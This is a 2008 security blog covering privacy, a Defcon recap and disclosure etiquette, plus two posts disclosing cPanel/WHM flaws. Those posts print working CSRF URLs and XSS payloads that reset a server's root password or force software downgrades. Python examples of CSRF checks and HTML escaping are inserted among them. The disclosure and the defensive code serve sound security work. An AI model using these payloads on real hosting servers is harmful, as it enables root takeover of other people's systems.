Skeptikal.org

Friday, August 29, 2008

Privacy Comic

Privacy is a pretty touchy subject for me. In short, I don't really trust anybody who isn't me.

The government has illustrated time and again that they can't keep private data private. Corporate America isn't far behind. As a stereotypical counterculturist, I frankly don't trust them to use the data in my best interests in the first place.

Anyways, I came across this comic today that nicely illustrates the need for people to be careful with data that they don't think is sensitive.


Monday, August 11, 2008

Defcon Wrapup

So here's the rundown, for those that didn't make it:

My 1-hour flight was delayed 3 hours, so I missed the Toxic BBQ. Don't fly Jet Blue.

Time-based SQL injection is cool. I started playing with it as a way to get around the blindness of blind SQL injection about 6 months back, but these guys are way better than me at it.

Captchas are on the way out. Their usefulness is decaying by the day; most of the big-name ones have been cracked already, and the small ones just aren't worth the effort... yet.

RSnake doesn't like Google. Google doesn't like RSnake. The talk was really good, but mostly not news if you've been following his blog for the past year.

Industrial espionage is cool.

iPhones in UPS boxes can be used to penetrate wireless networks from the mailroom. This is cool.

Dan Kaminsky can drink a lot of beer very quickly, but can also disappear quickly. He may be a ninja.

25 years later, WarGames is still cool.

I can still sleep through an entire economics lecture, even if it's about hacker economics.

DNS is broken. More importantly, we rely way too heavily on it. This is bad.

The state of Massachusetts can suppress a talk on breaking the Boston subway system, but they can't suppress one on breaking the Dutch subway system (which uses the same technology). Also, they can't recall the slides from the original talk.


An Open Letter to the Internet

In my day-to-day activities, I often find security vulnerabilities in websites, software, and services.

When I find these issues, I make an effort to contact the affected parties to disclose the vulnerabilities responsibly. Unfortunately, many vendors and website owners do not supply contact information on their site, or make it needlessly difficult to contact.

Back when I built my first website in the mid-90s, it was common practice to supply a webmaster's email address at the bottom of every page, or on a 'contact' page. I don't know why this practice seems to have died out, but it needs to come back.

Website Owners: Please put an email address or at least a contact form on your website for users to contact you regarding technical issues, problems with your website, or other concerns. It is in your best interest to communicate with your audience.

Vendors: Because your service is more complicated than a simple exchange of information with your clients, you have a higher responsibility (believe it or not) to acknowledge and address found issues. Provide a communication channel for users and non-users alike. Allow them to contact you anonymously if they wish. Do not require that they register, have an account, or log in to your website in order to contact you. And please, when you are alerted to an issue, thank the party in question, publicly acknowledge the issue, and fix it. Do not shoot the messenger; fix the problem.

Once a good-faith attempt has been made to disclose the issue, many of us will then make it public. This is bad for you. Don't get caught with your pants down. If you communicate with those who are trying to help, most will wait until you have fixed the issue to make it public.

We are here to help, but we aren't necessarily here to help you.


Saturday, August 9, 2008

More Fun With cPanel

I've had a few people contact me about this cPanel exploit, mostly people I'd rather not give further information to (sorry guys, but you're not even very good at being bad guys). Unfortunately, I also don't think anything will get fixed unless it gets made public.

I did some more work on the WHM interface, and it turns out that XSS isn't even necessary to change the root password. It can all be done with CSRF:
http://victim.com:2086/scripts/passwd?user=root&password=owned&password2=owned&submit-domain2=Change+Password

In case you're not familiar with CSRF, it is an extremely underrated vulnerability: forcing authenticated users to perform actions for you via well-placed links, resource tags, or open redirects.

Let me repeat that: If you are logged into cPanel, and you hit a website that I can embed an image link in (which is nearly every web site out there, these days), I can root your server. What's more, I won't leave any traces at all, because you actually root the server for me.

This is a big deal.

But it's worse than that. There are plenty of other CSRF holes in the WHM interface. Here, I can force you to download and install arbitrary code from cPanel's servers, downgrading or upgrading your software to a vulnerable version at will:

http://victim.com:2086/scripts2/saveuthemes?themetype=modules&${moduleName}=${versionNumber}

One final point, in case you think needing local access for my permanent XSS hole is too much work, here's a reflected XSS exploit:

http://victim.com:2086/scripts2/confdkillproc?%3Cscript%3Ealert(1337)%3C/script%3E=1&trusted=

Seriously, folks. Web-based management interfaces are a bad idea.
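The defensive side of the /scripts/passwd problem above, as an added example that is not cPanel's code (cPanel is Perl; Python stands in here). It assumes a hypothetical handler where the session stores an anti-CSRF token issued at login, the WHM origin is a placeholder, and the three sample requests are constructed: the forged GET from the post, a forged cross-site POST, and a genuine form submission.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical WHM origin; the host name is a placeholder, not a real server.
TRUSTED_ORIGIN = "https://victim.example:2086"


def _origin_of(url):
    """Reduce an Origin or Referer header value to scheme://host[:port]."""
    parts = urlsplit(url)
    return "%s://%s" % (parts.scheme, parts.netloc)


def check_passwd_request(method, headers, params, session_token):
    """Decide whether a /scripts/passwd request may run. Returns (allowed, reason).

    1. Only POST: an <img> tag or link planted on another site can only issue GET.
    2. Origin (Referer as fallback) must name the WHM host itself.
    3. The form must carry the token issued to this login session, compared in
       constant time so the check leaks nothing about the token."""
    if method.upper() != "POST":
        return False, "state change via GET refused"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer header"
    if _origin_of(source) != TRUSTED_ORIGIN:
        return False, "cross-origin request refused"
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


def demo():
    """Constructed requests: the forged GET from the post, a forged cross-site
    POST, and a legitimate submission from the WHM form itself."""
    token = secrets.token_hex(16)  # issued at login, kept in the server-side session
    change = {"user": "root", "password": "owned", "password2": "owned"}
    forged_get = check_passwd_request("GET", {"Referer": "https://blog.example/"}, change, token)
    forged_post = check_passwd_request("POST", {"Origin": "https://blog.example"}, change, token)
    legit = check_passwd_request("POST", {"Origin": TRUSTED_ORIGIN},
                                 dict(change, csrf_token=token), token)
    return forged_get, forged_post, legit


if __name__ == "__main__":
    for result in demo():
        print(result)
```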


Thursday, August 7, 2008

Happy Orange Day

I'll try to avoid political discussions in the future, but I was on the CERT website today, and couldn't help noticing that the national threat level is currently "Orange". I'll be flying down to Defcon tonight and I don't like body-cavity searches, so out of curiosity I clicked through.

The U.S. threat level is High, or Orange, for all domestic and international flights. Only small amounts of liquids, aerosols and gels are allowed in carry-on baggage. See the Transportation Security Administration (TSA) Web site for up-to-date information on items permitted and prohibited on airlines.

There is no credible, specific intelligence suggesting an imminent threat to the homeland at this time.

Um.

Thanks for that, DHS-people. Way to win the 'War on Terror'.


Wednesday, August 6, 2008

McAfee takes the Pwnie

At Black Hat tonight, McAfee won the Pwnie Award for lamest vendor response.

Good for them. I have to say, they deserve it.


Tuesday, August 5, 2008

cPanel Root XSS

cPanel is the industry leader in web hosting management software. According to their website, the software is used on "tens of thousands of servers worldwide". Basically, cPanel provides all the traditional UNIX system administration tools through a web-based interface. The interface is very nice, and I have a healthy chunk of respect for the perl-fu of the developers that built it.

From a security aspect, however, the software is flawed by design. The first problem is that mass hosting is the dumbest idea in the world. I'll talk about that in future posts.

The second problem, and the point of this post, is that by combining low-level tools with a web interface, you tend to get the worst of both worlds. An attacker can use techniques from the still-relatively-new domain of web application security to perform old-school attacks that have been fixed many times over.

It turns out that you can, in fact, use cross-site scripting to hack a server.

Here's an example. I have quite a few more XSS and CSRF holes, but this should suffice for making my point.

Every cPanel user's account contains a file titled .contactemail in its home directory. This is used to tell the server and administrators who to email when things go south, and can be changed by the user through the cPanel interface, the file manager tool, FTP, or through local scripts. It's only a text file, after all. Assuming we set our email address to:

"onmouseover="alert(1337)

When the friendly system administrator tries to reset our email address (because we forgot our password, obviously), he will receive an alert box in his browser.

But an alert box doesn't really demonstrate anything. Fortunately the WHM (Web Hosting Manager) interface has enough functionality that we can perform just about any system-level task we want. This one will reset the root password to 'owned':

"onmouseover="f=document.forms[0];f.action='/scripts/passwd';f.user.value='root';f.removeChild(f.domain);d=document.createElement('input');f.appendChild(d);d.name='password';d.value='owned';d=document.createElement('input');f.appendChild(d);d.name='password2';d.value='owned';f.submit()

Of course, the only limit is your imagination: WHM can set up cron jobs, add and delete users, send full backups to a server of your choice, and reformat hard drives.
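Why the .contactemail value above breaks out of the form field, and what the fix looks like, as an added example that is not cPanel's code (Python stands in for cPanel's Perl). The form template is a hypothetical stand-in for the WHM page, and the payload is the one quoted earlier in this post; the stdlib HTML parser shows which attributes a browser would end up with in each case.

```python
import html
from html.parser import HTMLParser

# Constructed input, taken from the post above: a .contactemail value that
# closes the value="..." attribute and smuggles in an event handler.
CONTACT_EMAIL_PAYLOAD = '"onmouseover="alert(1337)'

# Hypothetical form template standing in for the WHM "reset contact email"
# page; the real cPanel markup is not reproduced here.
FIELD_TEMPLATE = '<input type="text" name="contactemail" value="%s">'


def render_contact_field_unsafe(contact_email):
    """Vulnerable pattern: file contents pasted straight into an attribute."""
    return FIELD_TEMPLATE % contact_email


def render_contact_field_safe(contact_email):
    """Hardened pattern: escape for the attribute context. quote=True turns
    '"' into '&quot;', so the untrusted text can never end the attribute."""
    return FIELD_TEMPLATE % html.escape(contact_email, quote=True)


class _InputAttrs(HTMLParser):
    """Collects the attributes the parser assigns to the <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parse_input_attributes(markup):
    """Parse rendered markup and return the <input> attributes as a dict;
    values come back entity-decoded, the way a browser would see them."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    for label, render in (("unsafe", render_contact_field_unsafe),
                          ("safe", render_contact_field_safe)):
        print(label, "->", parse_input_attributes(render(CONTACT_EMAIL_PAYLOAD)))
```

In the unsafe rendering the parser reports a separate onmouseover attribute; in the safe one the whole payload is just the literal value of the field.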

I'll be honest: I like having web-based administration for servers, routers, printers, and other appliances. Web standards are cross-platform, and browser support is getting better all the time. But do we really need to replace shell-based administration with a web interface? I'm not going to answer "no" right away, but if you're going to do it, you need to be aware of the risks, and awfully careful.

Based on my experiences as both a coder and a penetration tester, a huge majority of developers (even the really good ones) don't understand what security risks there are, much less how to mitigate them. This isn't a problem that is limited to web developers, but it is much more pronounced in that field.

With that in mind, many of my future posts are going to be directed not to other security researchers, but to developers. If they are going to make an interface for managing a server, hopefully they care enough to educate themselves on the risks.

The exploit code above was last tested with cPanel 11.23.4-R26118/WHM 11.23.2 on 8-4-2008.


Sunday, August 3, 2008

First In, First Out

At Russ McRee's urging, I've decided to start publishing more of my security research.

The problem is this: I keep finding security issues, and don't have anywhere to put them. The vendors largely ignore me, and there's too much noise with the vulnerability tracking sites like Secunia.

So I'm going to be noisy too.

Don't plan on regular updates, because I only expect to write when I have something to say. That said, I've got a fairly large backlog of things to say. As pretty as the design is, I would just subscribe to the RSS feed if I were you.

I'll try not to disappoint.